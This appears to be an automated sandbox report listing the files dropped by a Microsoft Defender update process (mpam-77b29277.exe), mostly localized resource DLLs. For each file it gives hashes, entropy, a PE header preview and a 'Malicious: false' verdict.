SHA-512:	4A8EEA2ADEDFC1E7267E13F369F50E17AE2A578E28CC15C248F54444925D0196F509F8FF16E8011DC30EB28A8A3E9620F0716E27B50D6933B1283433BF2A88F3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........V.......................................................^....@.......................................... ...S...........X... ...........................................................................................rdata..p...........................@..@.rsrc....S... ...T..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..@N...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\en-GB\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	58600
Entropy (8bit):	4.25269307683972
Encrypted:	false
SSDEEP:	768:7rSJb3XsmqEiqcTr247sEBhEChEehELQRQ4hEYDGR1PYq:qJb3XDqZqc/7skv7rfGHPYq
MD5:	8DE66C308CA2A9340CC9E84F753FAA56
SHA1:	8D70F8339E74BD7730E0E876D3B23412CCB1DA63
SHA-256:	AE6A41CA40A926287BCC94503AC9AD42568D6BB62B4CF2DF60F0599FA9E988FF
SHA-512:	E0E6D0919E21049618E23F7850F83015A9EBB2A802EED22A9ED547421552F3BD2AD3B76BBC66966BA935EF5A152B235EB4A4D5C60379CCA4A2223D5514674ED6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.....................................................................@.......................................... .................. ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\en-GB\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	27880
Entropy (8bit):	5.0955466583627835
Encrypted:	false
SSDEEP:	384:7rTHD0EhR32NSWS8/W5RDBRJqH24rlGsQhJ+:7rbYhtMR1P26LQ
MD5:	DD65190763621E8E1B642A4305D5E801
SHA1:	D9BCFD1CBDC637B9F1211BADEF89F55B8C19D1E3
SHA-256:	8CBEC55311F2B7234D1FBD9C46AB6CF33A165610960132FE73C19FF725579658
SHA-512:	C51D7DC6B9410AFE72BD2C65989469FFF3ED6B41C5D5C9ED1320EEAD78742B840CED18C2B479DB06959B9DF69F28C116B047AE8D4A5ABBF3AB9546713E878C7D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........J...............................................p......R.....@.......................................... ...F...........L... ...........................................................................................rdata..p...........................@..@.rsrc....F... ...H..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..HA...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\en-US\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	59128
Entropy (8bit):	4.293356301291751
Encrypted:	false
SSDEEP:	768:7rxiJbyt33aEhrdTTm147vXahEzhEthEGQRQwhE3DbR1PR:5iJbytHa6rdd7vM+4ImbHPR
MD5:	BC78A3B5260E268C292724EA573194F9
SHA1:	02D4A4E683609B5B61834520D27B138EF3F9F7C4
SHA-256:	2C4B8F48370B6ADEA49A21F2D89F2400E54C3EE937120152B50A94FFE5F5F7A9
SHA-512:	985B104584656A099A5C20C85C77488D2575CA518353DF585B99E37B0596A46BFF5C32DF197A823569BF6909755406C48B9D41861A1C4A947BF1FE616519AF90
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\en-US\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	51944
Entropy (8bit):	4.448866330393985
Encrypted:	false
SSDEEP:	384:7rsorOioFEr4H1n3/Dtkby/g1mwhqfB9hyINcNkHoal34Y0wNl8yWucBW+RDBRJD:7rcBH1/b4Y0wNl8Cc5R1PeX8
MD5:	0D87F3932078B4049523B8CDD3EE5692
SHA1:	EA172545FB8E872BE0FC9AF0B58C3FA8CAF6F970
SHA-256:	46022C8F7CC601BF73D231C213612BFAED0E95A76BC510DA08B7323EC1CCB2EE
SHA-512:	51CFF3304353B5992D63C2F0C1CA71ACD74E3A4E8EF009B525BD6720BA4BCEA83A212516E41E086AFDB74E7A36DE0E4674517CAD84D8EB2E7545E34773D35554
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................}(....@.......................................... ..$................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\en-US\ProtectionManagement.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	52456
Entropy (8bit):	4.449895321849691
Encrypted:	false
SSDEEP:	768:7rypn9K/Gd67WzUi+YXCujpbemXuQx/Vhjhxp1ZR1P4M8/GQT:ap9KOPZXC+XLjZHPQ/x
MD5:	57DD5DCD626332FA892BF1526D09C1D9
SHA1:	B0D2C0D3CC46C7E7F560D11117C5DD7C2817AF5C
SHA-256:	385171BD15127FB8546EF4378CBEA2BF25F5063E6E731DFEB4EF868829FB25B9
SHA-512:	4F59C6E5DE864D07A675ECA116AB308C25CFA67EBB8345376FC98ECEFDA49CBF0BFD96A7371E398EC661E7F546C84C49D6E98556F767B32432E03BFFED04C278
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............l...........T...8...8.......l...........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....%..H....rsrc$02.... ...=..E.......'G.:3..t.E....R<l...........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\en-US\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	27384
Entropy (8bit):	5.027883032614938
Encrypted:	false
SSDEEP:	384:7rHwnD0qkg1Wl+R0UdhR3ZVdZFzd4SWS8/WNRDBRJbQl5c:7rQnYqkg1Wl+R0U7VXFzdOIR1PbT
MD5:	FEA5726C8962F98A3601E47EADB5A3E9
SHA1:	FDDCB373EEC6E22B7706A588CDDA4F0822237538
SHA-256:	FC18C509866893EB03BC82F49C0EF07C344640CF8D6FA3963247ABB7521A4A56
SHA-512:	CB63D5656B1822668285B6C1B1594BBE1B364EF45AC4C5618D7C436C93BD38623B06140383DE58A610EA7FEB92BB741AC7477AAB104A0CCBF671125D2D83CA5C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........H...............................................p............@.......................................... ...E...........J... ...........................................................................................rdata..p...........................@..@.rsrc....E... ...F..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..@A...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\endpointdlp.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	647416
Entropy (8bit):	6.2677434000059975
Encrypted:	false
SSDEEP:	12288:RE74OZLauRb4Z7W42oza9hIXTzq+g57U2ibvko43Shu/6U:toLauRaWMTPg9U2ibcH3SU
MD5:	BBDFA9DA2F8E10903C095F504A2188B1
SHA1:	E670D3739742A460C8C3AA5A2CC911A4ACFEFA8D
SHA-256:	4B3DE446F41D0410C06E9FAFF8823D380BCBDADB5B381C702CE3A5E2535A7142
SHA-512:	A30280A65726142551F2CBFB3A41337B309BDBEABCF710B5654CBD1415453AD2D69A7EC7C753A4E297557755D4204CABA4881938F805E667888523CD99F338FF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M2`..S...S...S...!...S...S..S...!...S...!..+S...!...S...!...S...&...S...&..XS...&...S...&...S..Rich.S..........................PE..d...+s.P.........." ......... ......`M...............................................\|....`A............................................................(....`...K....... ...........G..p.......................(.......8............................................text............................... ..`.rdata...m.......p..................@..@.data....9... ...0... ..............@....pdata...K...`...P...P..............@..@.rsrc...(...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\es-ES\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	67816
Entropy (8bit):	4.139143013850931
Encrypted:	false
SSDEEP:	768:7r690VA3iN3v240ynoFXuAQ8UyCNbHQSfr+FABZgdTypKR1PJl:iyHGyoFXXfW7Q2r+FAodTypKHPJl
MD5:	B6A28B3D905B28545AC4EC448846C6F4
SHA1:	C59E0A7600A0A76B25B46A7B5D1574BA09FC6826
SHA-256:	89404202E75E8D03AF2458906D9622C7ECD43F4B30180B079B143B77EA6BA6A4
SHA-512:	650319B0A81FB5A1BACE4760C14BA37245A9FB23F4A7E5B18B3BE279A5EDF5063BB1CF5C8631AEC30ACEDCF3F92219B63279A4B01DA80C21B2182C88F56F9158
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................}.....@.......................................... ..h................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\es-ES\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	58616
Entropy (8bit):	4.347687086754615
Encrypted:	false
SSDEEP:	768:7ruyfm07DjkGDxibCs79eoh9ewh/6L3NM6MAM8rbrubOezWyi4JzOcfQT/ZsH+KY:5H6BJdLd0dZLTOy+JdVfQT/eNNTvHPtW
MD5:	1CEB1C751D2CF63A0856B30A74486565
SHA1:	7D388EF3D300849D5E08FFA8F37DBB72765EED9B
SHA-256:	4421F31079246BD5A8B2C76B305BD88251DE81DAA0DBFDC393ACE55198B58F34
SHA-512:	00929E60E67BB9ABD2D4081D387B13D25D819DDCEFABE3384C0FB70C47566FE675499768C1455DDAB7480D1696F956A2448DF1064E7A9DA72085F04A19EE39B9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................H.....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\es-ES\ProtectionManagement.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	53480
Entropy (8bit):	5.483586719154938
Encrypted:	false
SSDEEP:	768:7ruKwQ1QknY/H+2N+HLuwaJDMR/oHyXhIomrCi6EwmAVzR1PMJ:mKwTTHyPag4twc6zHPMJ
MD5:	1933FC68D4038B5431F7CB7AE468F393
SHA1:	E235F2EF1DD1656E1646AD15527C3D1E8AA4DDB0
SHA-256:	961DF898ABCAC1F2911002445BFC624327BC153874D5E3E7556E467B360A55E2
SHA-512:	1C9A1EEA8AE0A8DA611920CFD8010B585BE74DFBA8F3430828E0B3267BF6126E8158B4714A85F57C351B02D8009468A5EB13027E1E7FAF33D4FC4424BBEA7120
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................L.....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............l...........T...8...8.......l...........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....%..H....rsrc$02.... ...=..E.......'G.:3..t.E....R<l...........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\es-ES\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30456
Entropy (8bit):	4.917070528485799
Encrypted:	false
SSDEEP:	384:7rqG15z+i+7W7n++XyKTDQfOWS8/WzRDBRJ5l5ppJM:7rLBiKTDQLGR1PrHM
MD5:	2FDE66202B0916607183D62E68CFB1B5
SHA1:	2525D696877DB1F0C13ADF15174BB219466F5782
SHA-256:	AF712FBC07C22C3950C81F0F207EC5CB078591E16857DE6373ACDE71B814305E
SHA-512:	D0606A25CF2581FE11E0A122AA080A639D3E69BA8EF2B3A21F6F4985E2D2275C530DDBF6FAFB23D20AE99D7FA4B6D5895F5CD7EDF2A1723BED96B0D919C5FBE3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........T.......................................................`....@.......................................... ..<Q...........V... ...........................................................................................rdata..p...........................@..@.rsrc...<Q... ...R..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...L...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\es-MX\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	66808
Entropy (8bit):	4.12608368962796
Encrypted:	false
SSDEEP:	768:7rJ90VX3iN3vpSnynoFXuAQ8UqVaFUk6s3vmxZZL1M+J0R1P6zE:xyAUyoFXXvk/Jvmxr1M+J0HPAE
MD5:	D1CBA62B76E5E851B8922EABFF2DEF6D
SHA1:	E5776BFACF829F2254D9421646AAF9E59A68FDEF
SHA-256:	1F9767C1C1EFE0C4D19D0F22C8FA6ADB60E4E88013CF8112D0BC60608EDDEE5C
SHA-512:	BE116298568BACF0A55637B39DBD5D7866EAEDA94448A0D866228104885B80CAFE47BF552B0B927E06E434BB3F922B06BAD51A16D547EF0F44CF9BAF066C0525
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.................................................................N....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\es-MX\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30952
Entropy (8bit):	4.874668095617591
Encrypted:	false
SSDEEP:	384:7rTJmsPXPLe/MvLyWF4eGOWS8/WFRDBRJw+TEQmDWlGszRnh1Rm:7r95PrF4bL4R1Pwf1zOpm
MD5:	D69771B02DB93D6F6E8A343978F499A7
SHA1:	671655DDAA4F02398C8C0FF41E03E30593C54562
SHA-256:	9FCBDA0A30314F5A45CB005475AC90FFDC60585EF7816CBE691544F1E2299BA1
SHA-512:	BE6556B9D1D0B87E37BEC666C31292EAB99F7A33AAB2981B7AB933A3071585EE0CAA2544E16F394C3DBEC8F0338BE39D2EBC366EC7B373482D5B5791C557AAFD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........V......................................................=.....@.......................................... ...S...........X... ...........................................................................................rdata..p...........................@..@.rsrc....S... ...T..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...N...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\et-EE\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	60136
Entropy (8bit):	4.279972277616321
Encrypted:	false
SSDEEP:	384:7r4lfeNOqeYwPyTvYH3ZhKFcnxwOjCIpD/smvDRJ1Y3NabzczgUpUoU+IV0NROTI:7rVNOqz43S2Dbp5xKoU4R1Pky5sJ
MD5:	97EDA100F26EAF8E95056AE742554177
SHA1:	E50DC2B9160F012316FE1E6F471741D872368574
SHA-256:	A326D66D07ED074A9494E53193584BB675C29CA70198A14C9ADBA3CE8CBC3BBB
SHA-512:	76D18333AF20CB4A11839052952406E2667C03C0414F5A7215EA50258B75321451FEBAC38340D980DCC5F6404EAA19F95969498CB15A299B0D9CF6EC9BCBF40D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ..p................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\et-EE\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28920
Entropy (8bit):	4.980025498831489
Encrypted:	false
SSDEEP:	384:7rvaiEvMcb+v7owbUG7m5OqulPyk8Nq5HjWS8/WRRDBRJb1ghl95x:7rCi+q5kkR1Pb6zx
MD5:	FB98D0BE2991E0FE20A069D56CD23B42
SHA1:	24E503AEE7CDFA8F93B40B32774870B6D6E8E8A8
SHA-256:	ACC123176D10917CDF790A10081628D31E7AACEC9C8ECDC97A44E3A6E3C25080
SHA-512:	1758E536F858666BC38AF0272EFBCBAAD54259105F40FF07A07F70E29AB890166B8D8DA0AB1C10253C5B2BB68831FAD9B7F34BEEF25C457B455848AD7194E41F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........N...............................................p............@.......................................... ...K...........P... ...........................................................................................rdata..p...........................@..@.rsrc....K... ...L..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...F...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\eu-ES\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29416
Entropy (8bit):	4.925457782958137
Encrypted:	false
SSDEEP:	384:7r2dNnmbM1oBRvEAJ75KLysWS8/WdRDBRJLs4lGsQYV8:7rBbVhbgR1Po5V
MD5:	5B10AF1242CA7F648B490741F2DF8520
SHA1:	161D717DFF1072C6622DD3A61F298D8484B378CA
SHA-256:	AA5C7A32CE883F00D45F4AEAE72DFE705AE507181CC2CE689BF2426740EF2B83
SHA-512:	8BB0F6C91D5D3D756584A870641234274281A50C57F09DA47860E75F453BC8FA19CD4867B45DDF19DDB25C3EB1BABDEA8B3C145F1FD7A75CCFBB9A21FCCD8970
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........P...............................................p.......l....@.......................................... ...M...........R... ...........................................................................................rdata..p...........................@..@.rsrc....M... ...N..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..0I...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\fa-IR\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	27368
Entropy (8bit):	5.474109560037299
Encrypted:	false
SSDEEP:	384:7rb5YGIOg9Zud+uROYGK8YGV5wYGa5GcmYGWm58JfFp0Gb0Q96Gv2coqbpy4mNrf:7rQvBOcXpwr0R1PAhXXCqR
MD5:	2B63BA7C3221EF6A93F9C2619E2C8A84
SHA1:	29A0C71E93399CA8AD8F12055115B1400AC0B566
SHA-256:	DE20279D35B8D326D76479B3FF7DBE7A61173FAF3D449058070542D9D58CB6A2
SHA-512:	551EF3BF1B49D72AE75669E21C85F1F5AA0B3A11D48CBC740FB8B3E997C759B763C3F50019C39F43734323F056513D127334675A5D2B3771433BFAA6F209873C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........H...............................................p......[.....@.......................................... ..TE...........J... ...........................................................................................rdata..p...........................@..@.rsrc...TE... ...F..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...@...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\fi-FI\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	63208
Entropy (8bit):	4.2112392217059735
Encrypted:	false
SSDEEP:	768:7rCPIDH1Jg5qxf3Jpppxo6oyoyoa/DCy79vTMtR1Pk+:Z7jfi6oyoyo7yBYtHPk+
MD5:	F2D957706D1265AA7B251713A3220A20
SHA1:	76DA3606374A078890CD3FF97A9ED8751A6EB1B4
SHA-256:	77D9FD696576B30926E34F7695151F88211223C8554614F77EB0F9D7E7F440B8
SHA-512:	C1430BA932E97267FD4F3E0C913AA1DD093EF60B99FF297066B5227B2DD4B64A5FDB6C2563B16DD3DB05D6160570D61B72D272F35E230B746215835476E0F075
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ..L................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\fi-FI\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	53480
Entropy (8bit):	4.451441634787936
Encrypted:	false
SSDEEP:	768:7r5r1Y/GPl9V9JdhfiDQMlVLzEOq0TU8HYR1PgQZ:BraePl9V9JdhfiDXlUyYHPdZ
MD5:	7072A9CB63B9CB656A956520202F7CF9
SHA1:	C4B0D2B774AF2587B30F4916FCFE14CF5D45D96D
SHA-256:	09BE50B13ECC453C1ECC58DD010E571203F21C54A07D0378E9F38E21C71F3596
SHA-512:	33C423C67209132DF26EFC7C868DCA40EF4FB341AA275802D6A684EA18F63C8EEC36619DBA13DE641DB1F9C3AA5E06185351D333A5136E4212ACB0CBC744618E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\fi-FI\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29944
Entropy (8bit):	4.968490013753031
Encrypted:	false
SSDEEP:	768:7rAwH/9EeGsV/d3vvWivhEIA3uWJorH+R1PpzC:tH/9EBsV/dfvVbrH+HPlC
MD5:	2951324A4D9633A4A8920464A73DA9CE
SHA1:	2DD0B8C501DBCC318285C002B9E8C30A6A516AFD
SHA-256:	97EF042D4E86CC9E9808A75D2E139163FBDE643AF128C4F7EF0E9623AAFFEBF3
SHA-512:	99FFBF511640A34A8D4AE07AE684B8E1B374ED4CE44C8EF4A36DA45A2078F7E60675FD0467E2D804321B3853C46AF3A23DC1DA95E15F0CFBCB4A6FBA89730C47
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........R...............................................p............@.......................................... ..PN...........T... ...........................................................................................rdata..p...........................@..@.rsrc...PN... ...P..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...I...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

